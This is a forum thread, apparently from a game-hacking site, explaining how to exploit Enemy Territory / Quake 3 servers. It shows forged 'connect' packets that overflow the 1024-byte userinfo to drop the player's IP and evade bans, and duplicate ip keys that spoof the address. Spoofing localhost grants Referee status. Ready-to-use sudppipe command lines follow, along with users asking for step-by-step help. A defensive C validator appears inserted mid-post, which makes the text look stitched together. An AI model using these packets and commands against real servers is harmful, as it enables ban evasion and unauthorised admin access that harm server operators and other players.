OOB IP Spoofing exploits: Referee hack & Unban


  • admin

    Enemy Territory uses the Quake3 network protocol.

When you connect to a server, the communication is initialized by an OOB (Out of Band) message, whose format is:

    ����connect "<userinfo>"
    

The ���� shown above is the packet header: four 0xFF bytes (0xFF 0xFF 0xFF 0xFF) used to identify the packet type.

    connect is the command being sent.

    The userinfo is a key-value string whose format is \key\value.

The userinfo contains:

    • g_password: the server password
    • cl_guid: the etkey
    • cl_wwwDownload: whether the client allows pk3 download
    • name: the player name
    • rate: the packet transfer rate
    • snaps: the ping adjustment?
    • cl_punkbuster: whether PunkBuster is enabled
    • protocol: the protocol version, here 84
    • qport: the client port used
    • challenge: a random number?

    The raw line looks like this:

    ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564"
    

Now, when the server receives the connect message, it appends another key-value pair at the end of your userinfo: your IP.

    ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564\ip\216.3.128.12:60252"
    

There are two ways to alter this value.

    Buffer Overflow

The <userinfo> is stored in a char array of size 1024:

    #define MAX_INFO_STRING 1024
    

so the idea is to add a key-value pair of (1024 minus the current <userinfo> length) characters at the end of the sent userinfo.

    It looks like this:

    ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\738\challenge\385942564\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    

So here the sent string is my <userinfo> followed by a key of 421 A's and a value of 420 A's (\421 × A\420 × A).

When the server receives that, it adds your IP after your userinfo, but since the string is stored in a char[1024] variable, a buffer overflow occurs and your IP is discarded.

    The server no longer knows your current IP, so if you were IP banned, you are not anymore.

    Duplicate field exploit

If the server receives the same key twice in the userinfo string, it removes the last occurrence of the duplicated key.

    Inserting

    \ip\216.3.128.12:60252\ip\216.3.128.12:60252
    

after the name key (for example) will make the server remove the last ip key, which is your real IP, keeping the one you inserted in your forged userinfo.

    The raw line would look like this:

    ����connect "\g_password\none\cl_guid\CE0C2139D870D721E895A39BB06500C6\cl_wwwDownload\1\ip\locahost\ip\localhost\name\ETPlayer\rate\25000\snaps\20\cl_anonymous\0\cl_punkbuster\1\protocol\84\qport\693\challenge\385942564"
    

This method makes it possible to spoof your IP.

    IP spoofing also enables another exploit.

    Referee hack

    Instead of spoofing the IP to a random IP like 216.3.128.12, spoofing it to localhost will automatically promote the player to Referee status.
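As an added server-side check covering both the length trick and the duplicate-key trick above (this is example code written for this page, not code from the post or from the Quake 3 / Enemy Territory engine; the function names, the MAX_KEYS limit and the sample strings are my own), the following validator rejects a userinfo that leaves no room for the server-appended \ip\ key, any client-supplied ip key, and any repeated key, so neither trick can displace the real address:

```c
#include <ctype.h>
#include <string.h>

#define MAX_INFO_STRING 1024   /* the engine's limit quoted in the post */
#define IP_KEY_RESERVE (sizeof("\\ip\\255.255.255.255:65535") - 1) /* longest appended ip key */
#define MAX_KEYS 64            /* limit chosen for this example */

/* Case-insensitive compare of exactly n bytes; Q3 userinfo keys are case-insensitive. */
static int key_eq(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Returns 1 if a "\key\value..." userinfo may be accepted, 0 if it must be rejected:
 * it must leave room for the server-appended ip key (so the append is never dropped),
 * must not carry a client-supplied "ip" key, and must not repeat any key (so the
 * "remove the last duplicate" rule can never remove the real ip). */
int userinfo_is_acceptable(const char *info)
{
    const char *keys[MAX_KEYS], *p = info;
    size_t keylens[MAX_KEYS], nkeys = 0, len = strlen(info);
    if (len == 0 || info[0] != '\\' || len + IP_KEY_RESERVE >= MAX_INFO_STRING) return 0;
    while (*p == '\\') {
        const char *key = p + 1, *kend = strchr(key, '\\');
        if (kend == NULL || kend == key) return 0;              /* missing value or empty key */
        const char *val = kend + 1, *vend = strchr(val, '\\');
        size_t klen = (size_t)(kend - key);
        if (klen == 2 && key_eq(key, "ip", 2)) return 0;        /* client tried to set ip */
        for (size_t i = 0; i < nkeys; i++)
            if (keylens[i] == klen && key_eq(keys[i], key, klen)) return 0; /* duplicate key */
        if (nkeys == MAX_KEYS) return 0;
        keys[nkeys] = key; keylens[nkeys++] = klen;
        p = vend ? vend : val + strlen(val);
    }
    return *p == '\0';
}

/* Constructed inputs: a trimmed copy of the post's sample userinfo, and a duplicate-ip variant. */
const char SAMPLE_OK[] = "\\g_password\\none\\cl_guid\\CE0C2139D870D721E895A39BB06500C6"
    "\\cl_wwwDownload\\1\\name\\ETPlayer\\rate\\25000\\snaps\\20\\protocol\\84\\qport\\738";
const char SAMPLE_DUP_IP[] = "\\cl_wwwDownload\\1\\ip\\localhost\\ip\\localhost\\name\\ETPlayer";

/* Constructed input padded with "\pad\AAAA..." to the length at which the appended ip key
 * no longer fits; returns 1 when the validator (correctly) rejects it. */
int padded_userinfo_is_rejected(void)
{
    char buf[MAX_INFO_STRING];
    size_t n = MAX_INFO_STRING - IP_KEY_RESERVE;                /* 999 bytes */
    memcpy(buf, "\\name\\ETPlayer\\pad\\", 19);
    memset(buf + 19, 'A', n - 19);
    buf[n] = '\0';
    return !userinfo_is_acceptable(buf);
}
```

A rejected connect should also be logged with the offending key and the sender's real address, since a client sending its own ip key is a strong signal of ban evasion.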



  • Does it still work?


  • admin

    @DrWindows On some servers yes



• I don't get how it works. Can you explain that ref hack?


  • admin

You can use Simple UDP proxy/pipe 0.4.1 (sudppipe) with Quake 3 engine "connect" modifier 0.2 (q3conmod_sudp) (compatible with Enemy Territory as it uses the Quake 3 network protocol).

    Plugin for sudppipe which allows a simple customization of the "connect" packet for the games which use the Quake 3 engine:

    sudppipe -l q3conmod_sudp.dll -L "\parameter1\value1\parameter2\value2" IP PORT 1234

    (use -L "" for the runtime help) then from the console of the game type:

    /connect 127.0.0.1:1234

    The following is an example for joining a server which uses PunkBuster with PB disabled (the client will be kicked after some seconds/minutes):

    sudppipe -l q3conmod_sudp.dll -L "\cl_punkbuster\1" SERVER PORT 1234

    then from the client:

    /pb_cl_disable
    /connect 127.0.0.1:1234

    So to spoof your IP address, you can use:

    sudppipe -l q3conmod_sudp.dll -L "\ip\216.3.128.12:60252\ip\216.3.128.12:60252" SERVER PORT 1234

    Then, in game: /connect 127.0.0.1:1234



• @Annihil I don't get anything xD. Where do I need to type that?


  • admin

    @DrWindows In the Windows Command Prompt (cmd)



• It's really confusing.

    Can you write a tutorial like:
    1st you do this,
    2nd this, etc.?



• Hello!
    Do you know why it causes a cmd failure? I do everything according to your guide.
    Bat File:
    https://imgur.com/GMbzy40
    (4 is port)
    Connecting to server:
    https://i.imgur.com/HGHHjTT.jpg
    https://i.imgur.com/EZ94RS4.jpg
    https://i.imgur.com/vJh1ebI.jpg


